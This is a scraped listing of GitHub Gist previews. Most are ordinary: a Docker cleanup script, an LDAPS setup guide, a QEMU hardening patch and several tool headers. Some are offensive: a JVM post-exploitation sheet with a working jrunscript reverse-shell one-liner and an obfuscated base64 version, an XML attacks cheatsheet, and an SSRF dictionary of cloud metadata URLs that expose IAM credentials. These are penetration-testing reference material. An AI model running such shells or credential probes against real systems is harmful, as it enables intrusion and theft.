Skip to content

Instantly share code, notes, and snippets.

@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active December 13, 2023 15:02
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@MrTrustor
MrTrustor / clean-docker-for-mac.sh
Last active November 21, 2023 11:38
This script cleans the Docker.qcow2 file that takes a lot of disk space with Docker For Mac. You can specify some Docker images that you would like to keep.
#!/bin/bash
# Copyright 2017 Théo Chamley
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
# to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
@magnetikonline
magnetikonline / README.md
Last active November 15, 2024 20:59
Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers.

Enable LDAP over SSL (LDAPS) for Microsoft Active Directory servers

Tip

Microsoft active directory servers by default provide LDAP connections over unencrypted connections (boo!).

The steps below will create a new self signed certificate appropriate for use with and thus enabling LDAPS for an AD server. Of course the "self-signed" portion of this guide can be swapped out with a real vendor purchased certificate if required.

Steps have been tested successfully with Windows Server 2012R2, but should work with Windows Server 2008 without modification. Requires a working OpenSSL install (ideally Linux/OSX) and (obviously) a Windows Active Directory server.

@grimmlin
grimmlin / qemu-2.7.0-aslr_heap_pie_nx_wxorx_mmap.patch
Created January 22, 2017 22:17
Qemu aslr, heapaslr, pie, NX and W^X implementation (NX only for arm and mips atm)
diff -Naur qemu-2.7.0.orig/cpu-exec.c qemu-2.7.0/cpu-exec.c
--- qemu-2.7.0.orig/cpu-exec.c 2016-09-02 17:34:17.000000000 +0200
+++ qemu-2.7.0/cpu-exec.c 2017-01-19 09:34:00.817088525 +0100
@@ -33,6 +33,9 @@
#include "hw/i386/apic.h"
#endif
#include "sysemu/replay.h"
+#include "syscall_defs.h"
+
+extern int do_nx;
/*
Sample code to setup a GDT, and use segments.
Copyright(c) 2016 Chris Eagle
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2 as published by the Free Software Foundation.
@hugsy
hugsy / PatchClean.ps1
Last active August 16, 2024 10:14
PatchExtract.ps1 & PatchClean.ps1 from Greg Linares (all credits to @Laughing_Mantis)
<#
================
PATCHCLEAN.PS1
=================
Version 1.0 Patch Folder Cleaner by Greg Linares (@Laughing_Mantis)
This Tool will go through the patch folders created by PatchExtract.PS1 and look for files created older
than 30 days prior to the current date and move these to a sub folder named "OLD" in the patch folders.
@mgeeky
mgeeky / xml-attacks.md
Last active November 13, 2024 10:21
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.


@jhaddix
jhaddix / cloud_metadata.txt
Last active November 16, 2024 11:54 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@masatokinugawa
masatokinugawa / 0ctf_h4x0rs.space.md
Last active May 28, 2023 03:06
0CTF/TCTF 2018 Quals h4x0rs.space Writeup (Web 1000)

0CTF/TCTF 2018 Quals h4x0rs.space Writeup (Web 1000)

問題

I've made a blog platform let you write your secret. 
Nobody can know it since I enabled all of modern web security mechanism, is it cool, huh?

Get `document. cookie` of the admin.

h4x0rs.space